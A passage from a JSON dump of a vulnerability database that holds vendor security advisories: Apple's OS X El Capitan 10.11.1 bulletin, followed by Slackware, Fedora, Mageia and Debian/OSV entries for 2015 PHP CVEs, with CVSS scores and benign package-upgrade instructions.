Micro\r\n\r\nGraphics Drivers\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: A memory corruption issue existed in the kernel. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-7021 : Moony Li of Trend Micro\r\n\r\nImageIO\r\nAvailable for: OS X Mavericks v10.9.5 and OS X Yosemite v10.10.5\r\nImpact: Processing a maliciously crafted image file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nparsing of image metadata. 
These issues were addressed through\r\nimproved metadata validation.\r\nCVE-ID\r\nCVE-2015-5935 : Apple\r\nCVE-2015-5938 : Apple\r\n\r\nImageIO\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Processing a maliciously crafted image file may lead to\r\narbitrary code execution\r\nDescription: Multiple memory corruption issues existed in the\r\nparsing of image metadata. These issues were addressed through\r\nimproved metadata validation.\r\nCVE-ID\r\nCVE-2015-5936 : Apple\r\nCVE-2015-5937 : Apple\r\nCVE-2015-5939 : Apple\r\n\r\nIOAcceleratorFamily\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in\r\nIOAcceleratorFamily. This issue was addressed through improved memory\r\nhandling.\r\nCVE-ID\r\nCVE-2015-6996 : Ian Beer of Google Project Zero\r\n\r\nIOHIDFamily\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with kernel privileges\r\nDescription: A memory corruption issue existed in the kernel. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-6974 : Luca Todesco (@qwertyoruiop)\r\n\r\nKernel\r\nAvailable for: OS X Yosemite v10.10.5\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A type confusion issue existed in the validation of\r\nMach tasks. 
This issue was addressed through improved Mach task\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5932 : Luca Todesco (@qwertyoruiop), Filippo Bigarella\r\n\r\nKernel\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker with a privileged network position may be able\r\nto execute arbitrary code\r\nDescription: An uninitialized memory issue existed in the kernel.\r\nThis issue was addressed through improved memory initialization.\r\nCVE-ID\r\nCVE-2015-6988 : The Brainy Code Scanner (m00nbsd)\r\n\r\nKernel\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local application may be able to cause a denial of service\r\nDescription: An issue existed when reusing virtual memory. This\r\nissue was addressed through improved validation.\r\nCVE-ID\r\nCVE-2015-6994 : Mark Mentovai of Google Inc.\r\n\r\nlibarchive\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: A malicious application may be able to overwrite arbitrary\r\nfiles\r\nDescription: An issue existed within the path validation logic for\r\nsymlinks. This issue was addressed through improved path\r\nsanitization.\r\nCVE-ID\r\nCVE-2015-6984 : Christopher Crone of Infinit, Jonathan Schleifer\r\n\r\nMCX Application Restrictions\r\nAvailable for: OS X Yosemite v10.10.5 and OS X El Capitan 10.11\r\nImpact: A developer-signed executable may acquire restricted\r\nentitlements\r\nDescription: An entitlement validation issue existed in Managed\r\nConfiguration. A developer-signed app could bypass restrictions on\r\nuse of restricted entitlements and elevate privileges. This issue was\r\naddressed through improved provisioning profile validation.\r\nCVE-ID\r\nCVE-2015-7016 : Apple\r\n\r\nNet-SNMP\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker in a privileged network position may be able to\r\ncause a denial of service\r\nDescription: Multiple issues existed in netsnmp version 5.6. 
These\r\nissues were addressed by using patches affecting OS X from upstream.\r\nCVE-ID\r\nCVE-2012-6151\r\nCVE-2014-3565\r\n\r\nOpenGL\r\nAvailable for: OS X Mavericks v10.9.5, OS X Yosemite v10.10.5,\r\nand OS X El Capitan 10.11\r\nImpact: Visiting a maliciously crafted website may lead to arbitrary\r\ncode execution\r\nDescription: A memory corruption issue existed in OpenGL. This issue\r\nwas addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5924 : Apple\r\n\r\nOpenSSH\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to conduct impersonation attacks\r\nDescription: A privilege separation issue existed in PAM support.\r\nThis issue was addressed with improved authorization checks.\r\nCVE-ID\r\nCVE-2015-6563 : Moritz Jodeit of Blue Frost Security GmbH\r\n\r\nSandbox\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A local user may be able to execute arbitrary code with\r\nkernel privileges\r\nDescription: An input validation issue existed when handling NVRAM\r\nparameters. This issue was addressed through improved validation.\r\nCVE-ID\r\nCVE-2015-5945 : Rich Trouton (@rtrouton), Howard Hughes Medical\r\nInstitute, Apple\r\n\r\nScript Editor\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: An attacker may trick a user into running arbitrary\r\nAppleScript\r\nDescription: In some circumstances, Script Editor did not ask for\r\nuser confirmation before executing AppleScripts. This issue was\r\naddressed by prompting for user confirmation before executing\r\nAppleScripts.\r\nCVE-ID\r\nCVE-2015-7007 : Joe Vennix of Rapid7\r\n\r\nSecurity\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application may be able to overwrite arbitrary\r\nfiles\r\nDescription: A double free issue existed in the handling of\r\nAtomicBufferedFile descriptors. 
This issue was addressed through\r\nimproved validation of AtomicBufferedFile descriptors.\r\nCVE-ID\r\nCVE-2015-6983 : David Benjamin, Greg Kerr, Mark Mentovai and Sergey\r\nUlanov from the Chrome Team\r\n\r\nSecurityAgent\r\nAvailable for: OS X El Capitan 10.11\r\nImpact: A malicious application can programmatically control\r\nkeychain access prompts\r\nDescription: A method existed for applications to create synthetic\r\nclicks on keychain prompts. This was addressed by disabling synthetic\r\nclicks for keychain access windows.\r\nCVE-ID\r\nCVE-2015-5943\r\n\r\nInstallation note:\r\n\r\nOS X El Capitan v10.11.1 includes the security content of\r\nSafari 9.0.1: https://support.apple.com/kb/HT205377\r\n\r\nOS X El Capitan 10.11.1 and Security Update 2015-007 may be obtained\r\nfrom the Mac App Store or Apple's Software Downloads web site:\r\nhttp://www.apple.com/support/downloads/\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: https://support.apple.com/kb/HT201222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2015-10-25T00:00:00", "title": "APPLE-SA-2015-10-21-4 OS X El Capitan 10.11.1 and Security Update 2015-007", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-6976", "CVE-2015-7007", "CVE-2015-0235", "CVE-2015-5927", "CVE-2015-6975", "CVE-2015-7035", "CVE-2015-6987", "CVE-2015-7003", "CVE-2015-5924", "CVE-2015-6983", "CVE-2015-5939", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-7020", "CVE-2015-6994", "CVE-2015-7016", "CVE-2015-6992", "CVE-2015-7021", "CVE-2015-6977", "CVE-2014-3565", "CVE-2012-6151", "CVE-2015-5934", "CVE-2015-5940", "CVE-2015-5932", "CVE-2015-0273", "CVE-2015-6995", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-6985", "CVE-2015-5935", "CVE-2015-7010", "CVE-2015-5945", "CVE-2015-6984", "CVE-2015-7008", "CVE-2015-5937", 
"CVE-2015-7023", "CVE-2015-6993", "CVE-2015-6836", "CVE-2015-5936", "CVE-2015-6989", "CVE-2015-5942", "CVE-2015-7015", "CVE-2015-6990", "CVE-2015-7009", "CVE-2015-6988", "CVE-2015-5943", "CVE-2015-6996", "CVE-2015-6837", "CVE-2015-6563", "CVE-2015-5944", "CVE-2015-5925", "CVE-2015-5938", "CVE-2015-6974", "CVE-2015-6835", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017", "CVE-2015-5926", "CVE-2015-6838", "CVE-2015-5933"], "modified": "2015-10-25T00:00:00", "id": "SECURITYVULNS:DOC:32566", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32566", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:03:07", "description": "Code execution, information disclosure, restrictions bypass, multiple memory corruptions, multiple libraries vulnerabilities.", "edition": 2, "cvss3": {}, "published": "2015-10-25T00:00:00", "title": "Apple Mac OS X / Mac EFI / OS X Server multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2015-2348", "CVE-2014-9705", "CVE-2015-5883", "CVE-2015-2787", "CVE-2015-0232", "CVE-2015-5903", "CVE-2015-6976", "CVE-2015-7007", "CVE-2015-0235", "CVE-2015-2783", "CVE-2015-5877", "CVE-2015-5927", "CVE-2015-3785", "CVE-2015-5847", "CVE-2014-9427", "CVE-2015-3329", "CVE-2015-6975", "CVE-2015-3415", "CVE-2015-7035", "CVE-2015-3330", "CVE-2015-6987", "CVE-2015-5922", "CVE-2015-5865", "CVE-2015-5869", "CVE-2015-5879", "CVE-2015-7003", "CVE-2015-5876", "CVE-2015-5858", "CVE-2015-5924", "CVE-2015-5862", "CVE-2015-0286", "CVE-2015-5888", "CVE-2015-6983", "CVE-2015-5939", "CVE-2015-5874", "CVE-2015-6834", "CVE-2015-6991", "CVE-2015-5860", "CVE-2015-1855", "CVE-2015-7020", "CVE-2014-3618", "CVE-2015-6994", "CVE-2015-1352", "CVE-2015-7016", "CVE-2015-6992", "CVE-2015-2301", "CVE-2015-7021", "CVE-2015-6977", "CVE-2015-5868", "CVE-2014-3565", "CVE-2015-5872", "CVE-2015-5839", "CVE-2015-5840", "CVE-2014-6277", 
"CVE-2014-9425", "CVE-2014-9709", "CVE-2015-2305", "CVE-2012-6151", "CVE-2015-5934", "CVE-2015-5873", "CVE-2015-5940", "CVE-2015-5932", "CVE-2015-0273", "CVE-2015-5875", "CVE-2015-5882", "CVE-2015-5842", "CVE-2015-6995", "CVE-2015-6978", "CVE-2015-7018", "CVE-2015-5912", "CVE-2015-6985", "CVE-2015-2331", "CVE-2015-5870", "CVE-2015-5935", "CVE-2015-5722", "CVE-2015-7010", "CVE-2015-5945", "CVE-2015-6984", "CVE-2015-7008", "CVE-2015-5841", "CVE-2015-5894", "CVE-2015-5881", "CVE-2014-2532", "CVE-2015-5831", "CVE-2014-8147", "CVE-2015-5937", "CVE-2015-5878", "CVE-2015-5855", "CVE-2015-7023", "CVE-2014-8611", "CVE-2015-6993", "CVE-2015-5871", "CVE-2015-5866", "CVE-2015-5901", "CVE-2014-8090", "CVE-2015-6836", "CVE-2015-5884", "CVE-2015-3416", "CVE-2015-5936", "CVE-2015-5889", "CVE-2015-5867", "CVE-2015-5836", "CVE-2015-6989", "CVE-2015-5915", "CVE-2015-5900", "CVE-2015-5942", "CVE-2015-7015", "CVE-2015-5890", "CVE-2014-7187", "CVE-2014-8146", "CVE-2015-5854", "CVE-2015-6990", "CVE-2015-3414", "CVE-2015-7009", "CVE-2014-9652", "CVE-2015-7031", "CVE-2015-6988", "CVE-2015-5523", "CVE-2015-5986", "CVE-2015-5943", "CVE-2015-5885", "CVE-2015-6996", "CVE-2015-6837", "CVE-2013-3951", "CVE-2015-6563", "CVE-2015-5944", "CVE-2015-5893", "CVE-2015-5917", "CVE-2014-8080", "CVE-2015-1351", "CVE-2015-5524", "CVE-2015-5887", "CVE-2015-5902", "CVE-2015-5925", "CVE-2015-5938", "CVE-2015-0287", "CVE-2015-6974", "CVE-2015-5853", "CVE-2015-6835", "CVE-2015-5897", "CVE-2015-5830", "CVE-2015-5849", "CVE-2015-5896", "CVE-2015-5833", "CVE-2015-5863", "CVE-2015-0231", "CVE-2015-5864", "CVE-2014-7186", "CVE-2015-5891", "CVE-2015-7019", "CVE-2015-7006", "CVE-2015-7017", "CVE-2015-5914", "CVE-2015-5926", "CVE-2015-5522", "CVE-2015-5851", "CVE-2015-5899", "CVE-2015-6838", "CVE-2015-5933"], "modified": "2015-10-25T00:00:00", "id": "SECURITYVULNS:VULN:14702", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14702", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "slackware": [{"lastseen": "2021-07-28T14:46:42", "description": "New php packages are available for Slackware 14.0, 14.1, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/php-5.4.45-i486-1_slack14.1.txz: Upgraded.\n This update fixes some bugs and security issues.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6834\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6835\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6836\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6837\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6838\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.45-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.45-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.45-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.45-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.13-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.13-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\nfd9eae8306c09b0312682cff0eb14bb9 
php-5.4.45-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n275219372b3b99ceb5a550ea4470942a php-5.4.45-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nd14ce9b2a21578596ad1db1f645be3cc php-5.4.45-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n268e075dfd094f0ea3713766278db863 php-5.4.45-x86_64-1_slack14.1.txz\n\nSlackware -current package:\na8738293cf3e540aba18df07d0bcb49b n/php-5.6.13-i586-1.txz\n\nSlackware x86_64 -current package:\na437ac05a81ab12a2abab95736f052e0 n/php-5.6.13-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.4.45-i486-1_slack14.1.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-10-01T21:35:28", "type": "slackware", "title": "[slackware-security] php", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-10-01T21:35:28", "id": "SSA-2015-274-02", "href": 
"http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.399477", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module (often referred to as mod_php) which adds support for the PHP language to Apache HTTP Server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-14T23:22:46", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: php-5.6.13-1.fc22", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-14T23:22:46", "id": "FEDORA:90BE461976AB", "href": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NBWG3JAOKH4MJSW7CHVCRS7FZYVXXGMV/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module (often referred to as mod_php) which adds support for the PHP language to Apache HTTP Server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-14T22:23:26", "type": "fedora", "title": "[SECURITY] Fedora 21 Update: php-5.6.13-1.fc21", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-14T22:23:26", "id": "FEDORA:F0C5861361B0", "href": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/KIUXUYW7RJYZM3IKRZCQ526SCM3KUQBZ/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:53", "description": "PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled webpage with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The php package contains the module (often referred to as mod_php) which adds support for the PHP language to Apache HTTP Server. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-18T19:33:49", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: php-5.6.13-1.fc23", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-18T19:33:49", "id": "FEDORA:02C1260F4011", "href": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/64U4CM7WKXFYHBDMHJ7P5WQ3PYKUHSW2/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "Updated php packages fix security vulnerabilities: The php package has been updated to version 5.5.29, which fixes several security issues and other bugs. See the upstream ChangeLog for more details. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-09-13T21:58:30", "type": "mageia", "title": "Updated php packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-13T21:58:30", "id": "MGASA-2015-0365", "href": "https://advisories.mageia.org/MGASA-2015-0365.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2022-07-21T08:26:43", "description": "\nSeveral vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\n\nThe 
vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes. Please\nrefer to the upstream changelog for more information:\n\n\n* [\\\nhttps://php.net/ChangeLog-5.php#5.4.45](https://php.net/ChangeLog-5.php#5.4.45)\n* [\\\nhttps://php.net/ChangeLog-5.php#5.6.13](https://php.net/ChangeLog-5.php#5.6.13)\n\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.45-0+deb7u1.\n\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.13+dfsg-0+deb8u1.\n\n\nWe recommend that you upgrade your php5 packages.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-09-13T00:00:00", "type": "osv", "title": "php5 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2022-07-21T05:48:48", "id": "OSV:DSA-3358-1", "href": "https://osv.dev/vulnerability/DSA-3358-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-21T08:14:00", "description": "\n* 
[CVE-2015-6831](https://security-tracker.debian.org/tracker/CVE-2015-6831)\nA use-after-free vulnerability was found in the unserialize() function.\n We can create a ZVAL and free it via Serializable::unserialize.\n However, unserialize() will still allow R: or r: to be used to set\n references to that already freed memory. This makes a\n use-after-free attack possible, allowing arbitrary code to be executed remotely.\n* [CVE-2015-6832](https://security-tracker.debian.org/tracker/CVE-2015-6832)\nDangling pointer in the unserialization of ArrayObject items.\n* [CVE-2015-6833](https://security-tracker.debian.org/tracker/CVE-2015-6833)\nFiles extracted from an archive may be placed outside of the destination\n directory.\n* [CVE-2015-6834](https://security-tracker.debian.org/tracker/CVE-2015-6834)\nA use-after-free vulnerability was found in the unserialize() function.\n We can create a ZVAL and free it via Serializable::unserialize.\n However, unserialize() will still allow R: or r: to be used to set\n references to that already freed memory. This makes a\n use-after-free attack possible, allowing arbitrary code to be executed remotely.\n* [CVE-2015-6836](https://security-tracker.debian.org/tracker/CVE-2015-6836)\nA type confusion occurs within SOAP serialize\\_function\\_call due\n to insufficient validation of the headers field.\n In the SoapClient's \\_\\_call method, the verify\\_soap\\_headers\\_array\n check is applied only to headers retrieved from\n zend\\_parse\\_parameters; the problem is that a few lines later,\n soap\\_headers could be updated or even replaced with values from\n the \\_\\_default\\_headers object fields.\n* [CVE-2015-6837](https://security-tracker.debian.org/tracker/CVE-2015-6837)\nThe XSLTProcessor class misses a few checks on the input from the\n libxslt library. 
The valuePop() function call is able to return\n NULL pointer and php does not check that.\n* [CVE-2015-6838](https://security-tracker.debian.org/tracker/CVE-2015-6838)\nThe XSLTProcessor class misses a few checks on the input from the\n libxslt library. The valuePop() function call is able to return\n NULL pointer and php does not check that.\n* [CVE-2015-7803](https://security-tracker.debian.org/tracker/CVE-2015-7803)\nA NULL pointer dereference flaw was found in the way PHP's Phar\n extension parsed Phar archives. A specially crafted archive could\n cause PHP to crash.\n* [CVE-2015-7804](https://security-tracker.debian.org/tracker/CVE-2015-7804)\nAn uninitialized pointer use flaw was found in the\n phar\\_make\\_dirstream() function of PHP's Phar extension.\n A specially crafted phar file in the ZIP format with a directory\n entry with a file name \"/ZIP\" could cause a PHP application\n function to crash.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-11-08T00:00:00", "type": "osv", "title": "php5 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 